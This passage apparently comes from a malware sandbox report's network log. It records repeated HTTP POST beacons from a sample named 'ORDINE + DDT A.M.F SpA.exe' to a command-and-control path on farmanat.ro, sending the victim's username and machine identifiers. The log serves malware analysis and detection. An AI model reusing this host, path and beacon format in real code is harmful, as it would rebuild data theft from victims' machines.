                                              Nov 25, 2021 10:55:27.811363935 CET7510OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:27.861280918 CET7510INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:26 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              87192.168.11.2049924176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:54.951317072 CET6435OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:54.984689951 CET6435OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:55.038609028 CET6436INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:54 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              870192.168.11.2050718176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:28.274621964 CET7511OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:28.308180094 CET7511OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:28.358278990 CET7512INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:27 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              871192.168.11.2050719176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:28.757055044 CET7512OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:28.791507006 CET7513OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:28.842794895 CET7513INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:27 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              872192.168.11.2050720176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:29.273209095 CET7514OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:29.307553053 CET7514OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:29.358542919 CET7514INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:28 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              873192.168.11.2050721176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:29.703562975 CET7515OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:29.736932039 CET7515OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:29.790647984 CET7516INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:28 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              874192.168.11.2050722176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:30.142951012 CET7516OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:30.177015066 CET7517OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:30.227924109 CET7517INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:29 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              875192.168.11.2050723176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:30.577953100 CET7518OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:30.611521959 CET7518OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:30.660511971 CET7518INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:29 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              876192.168.11.2050724176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:31.094476938 CET7519OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:31.128005981 CET7519OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:31.186337948 CET7520INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:30 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              877192.168.11.2050725176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:31.594377041 CET7520OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:31.628566980 CET7521OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:31.680608034 CET7521INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:30 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              878192.168.11.2050726176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:32.108072042 CET7522OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:32.142311096 CET7522OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:32.199045897 CET7522INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:31 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              879192.168.11.2050727176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:32.638412952 CET7523OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:32.672657967 CET7523OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:32.723047018 CET7524INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:31 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              88192.168.11.2049925176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:55.484488964 CET6437OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:55.518080950 CET6437OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:55.568913937 CET6438INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:54 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              89192.168.11.2049926176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:56.007947922 CET6438OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:56.041470051 CET6439OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:56.094065905 CET6439INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:55 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              9192.168.11.2049844176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:06.230046034 CET6317OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:06.263920069 CET6318OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:06.314524889 CET6318INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:05 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              90192.168.11.2049927176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:56.507759094 CET6440OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:56.541923046 CET6440OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:56.596268892 CET6440INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:55 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              91192.168.11.2049928176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:57.040796995 CET6441OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:57.074956894 CET6441OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:57.126076937 CET6442INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:56 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              92192.168.11.2049929176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:57.544069052 CET6442OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:57.577482939 CET6443OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:57.626811028 CET6443INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:56 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              93192.168.11.2049930176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:58.081847906 CET6444OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:58.116245031 CET6444OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:58.168596029 CET6444INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:57 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              94192.168.11.2049931176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
